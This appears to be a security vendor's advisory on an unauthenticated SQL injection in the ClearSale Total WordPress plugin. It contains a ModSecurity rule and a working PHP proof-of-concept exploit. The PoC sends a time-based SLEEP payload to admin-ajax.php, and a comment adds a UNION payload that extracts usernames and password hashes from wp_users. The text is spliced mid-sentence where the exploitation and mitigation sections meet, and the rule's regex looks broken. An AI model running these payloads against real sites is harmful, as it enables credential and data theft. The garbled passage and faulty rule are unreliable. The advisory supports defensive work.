Atomic Edge analysis of CVE-2026-8705 (metadata-based): This is an unauthenticated SQL injection vulnerability in the ClearSale Total plugin for WordPress, affecting all versions up to and including 3.4.2. The vulnerability carries a CVSS score of 7.5 (HIGH), with an attack vector over network, low complexity, no privileges required, and no user interaction. The primary impact is confidentiality breach through extraction of sensitive data from the database.
Root Cause: The vulnerability stems from three compounding flaws, each confirmed by the CVE description. First, the AJAX handler `clearsale_total_push` is registered for unauthenticated users via `wp_ajax_nopriv_` hook. Second, although a `wp_verify_nonce()` call exists, its failure branch has the `die()` call commented out, allowing execution to continue without a valid nonce. Third, the attacker-supplied `pagseguro[metodo]` POST parameter is passed into a `switch($metodo)` construct that checks for case `4`, but on PHP versions below 8.0, loose type juggling causes the string `”4 AND SLEEP(5)”` to be considered equal to integer `4`, thus passing the guard. The parameter value is then directly interpolated into an unquoted SQL query `UPDATE wp_cs_total_dadosextras SET metodo=$metodo, …`, enabling classic SQL injection.
Exploitation: An unauthenticated attacker sends a POST request to `/wp-admin/admin-ajax.php` with `action=clearsale_total_push` and `pagseguro[metodo]` set to a malicious SQL payload. The payload must begin with the string `4` followed by SQL injection characters (e.g., a space and then arbitrary SQL) to exploit the loose comparison. For example, `pagseguro[metodo]=4 AND (SELECT SLEEP(5))` would trigger time-based SQL injection. The lack of nonce enforcement means the attacker does not need any session or token. The vulnerable endpoint is fully accessible without authentication, and the required PHP version (prepare()` in WordPress). The switch statement should use strict comparison (`===`) to prevent type juggling. Additionally, the plugin should restrict the AJAX endpoint to authenticated users only (using `wp_ajax_` instead of `wp_ajax_nopriv_`), or add proper capability checks. Without a patched version available, site administrators should disable the plugin until a fix is released.
Impact: Successful exploitation allows an unauthenticated attacker to execute arbitrary SQL queries against the WordPress database. This can lead to extraction of sensitive information such as user credentials, password hashes, personal data, and other plugin-specific data stored in the `wp_cs_total_dadosextras` table or any other table. The CVSS vector indicates HIGH confidentiality impact with no impact on integrity or availability, meaning the primary risk is data theft. However, depending on database permissions, an attacker might also be able to modify or delete data, potentially leading to full site compromise.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-8705 - ClearSale Total Unauthenticated SQL Injection via pagseguro[metodo]',severity:'CRITICAL',tag:'CVE-2026-8705'"
SecRule ARGS_POST:action "@streq clearsale_total_push"
"chain"
SecRule ARGS_POST:pagseguro[metodo] "@rx ^4[sS]"
"t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8705 - ClearSale Total <= 3.4.2 - Unauthenticated SQL Injection
// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site URL
// Endpoint
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';
// SQL injection payload: exploit loose comparison ("4" == 4) and inject SQL
// Using time-based blind injection to confirm vulnerability
$payload = '4 AND (SELECT SLEEP(5))';
// Build POST data
$post_data = array(
'action' => 'clearsale_total_push',
'pagseguro[metodo]' => $payload
);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Allow self-signed certs in testing
// Execute the request
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$duration = $end_time - $start_time;
// Close the connection
curl_close($ch);
// Check if sleep was executed (should be >= 5 seconds if vulnerable)
if ($duration >= 5) {
echo "[+] Vulnerability confirmed! SQL injection works. Response time: " . round($duration, 2) . " seconds.n";
} else {
echo "[-] Target does not appear vulnerable or server is not running PHP < 8.0. Response time: " . round($duration, 2) . " seconds.n";
}
// For data extraction, you can replace the SLEEP with a UNION-based payload:
// Example: $payload = '4 UNION SELECT user_login, user_pass, '', '' FROM wp_users';
// But note: the exact column count and query structure would require enumeration.
?>
